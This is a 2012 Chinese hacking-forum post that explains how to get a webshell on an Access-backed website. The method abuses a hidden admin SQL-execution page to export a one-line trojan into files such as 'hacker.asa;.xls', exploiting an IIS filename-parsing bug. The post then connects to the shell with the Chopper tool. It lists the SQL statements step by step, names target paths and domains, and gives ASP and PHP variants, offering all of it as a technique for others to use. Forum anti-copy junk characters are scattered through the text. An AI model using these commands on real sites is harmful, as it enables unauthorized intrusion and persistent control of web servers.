找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2036|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。" b; J9 H# K0 P) Q
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的9 y6 k8 ^1 j' W9 G0 x7 h2 t
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,9 ^8 ^; s6 d3 B' l9 T
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:7 W8 N0 a! s8 v! I  J5 p: i
1.create table cmd (a varchar(50))# `9 i( h! m, Q) y8 l
2.insert into cmd (a) values (‘‘)
6 `& [* Q* u1 A: X! j! p3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
( c9 E1 {) \2 w# n% ?" h(把表cmd的内容导出为物理路径的一个EXCEL文件)& k7 Q: O" ~+ ~# l
4.drop table cmd) ^* V/ f! O4 W; h5 J" U# ]- V4 W
利用IIS的BUG成功拿到了WEBSHELL。
) |/ Q, r% [% q3 G& U$ O% I8 B
$ |: m7 J4 t7 ~: X8 R, y3 F1 L直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
4 U" l4 v4 D# K6 {( q5 A% f5 E4 U! i: Q1 Y: D, |; ?! X# J
  SQL语句意思解释:7 |! {5 ?  M) F0 M# ?7 m" w& K
  第一句
8 K, \$ m2 g1 C, u  M. @' ]( S  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
  h4 `& J  `) f2 E5 ~
- Q8 U; q! h; s+ T( [+ I  第二句5 a' b% Z& f9 }/ n
  在表cmd的a字段插入一句话木马5 [& F! i/ d/ y7 U4 }
  第三句
, Z% q$ C! Z3 c& k4 N3 G  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件* z9 {: b( \( f5 j
3 A$ B4 B8 U; p( ?" D* Q' @/ ?6 h
  第四句
8 [* H* w$ A) T  D% |% x8 N  删除建立的cmd表
, X3 k6 n' J+ ]/ K7 r" ]
$ j& D5 ~8 m/ t( A! t  以下内容为测试:
8 O1 j- k# m0 T0 Q  Access利用后台SQL执行命令功能导出WebShell:
+ L. o( N1 w) P3 m4 [  这个更简单:. u8 g& [# q# M2 p0 S' D$ g2 l
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
; ~! |& o! h6 j8 R  或者
# I$ V8 e1 |& C% k- V5 A, ^  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]- L8 H* ?: Z2 x2 S3 ?, j
1 }$ B% c  \' n- L2 M" K
  后台有执行SQL语句功能(vote为已知表段)
7 O, W# y- E6 P1 l  ~" U9 v  希望对大家有所帮助拿shell的又一个思路
, g% T7 L9 D& j7 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表